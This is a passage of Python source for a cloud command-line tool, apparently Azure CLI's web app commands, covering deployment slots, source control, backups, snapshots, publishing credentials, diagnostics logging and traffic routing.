resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
HostNameBinding = cmd.get_models('HostNameBinding')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
SiteConfigResource = cmd.get_models('SiteConfigResource')
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise CLIError('Windows containers is not yet supported in app service environment')
ase_id = _validate_app_service_environment_id(cmd.cli_ctx, app_service_environment, resource_group_name)
ase_def = HostingEnvironmentProfile(id=ase_id)
ase_list = client.app_service_environments.list()
ase_found = False
for ase in ase_list:
if ase.id.lower() == ase_id.lower():
location = ase.location
ase_found = True
break
if not ase_found:
raise CLIError("App service environment '{}' not found in subscription.".format(ase_id))
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_location_from_resource_group(cli_ctx, resource_group_name):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging:
fs_log = None
blob_log = None
level = application_logging != 'off'
if application_logging in ['filesystem', 'off']:
fs_log = FileSystemApplicationLogsConfig(level=level)
level = application_logging != 'off'
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
if action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
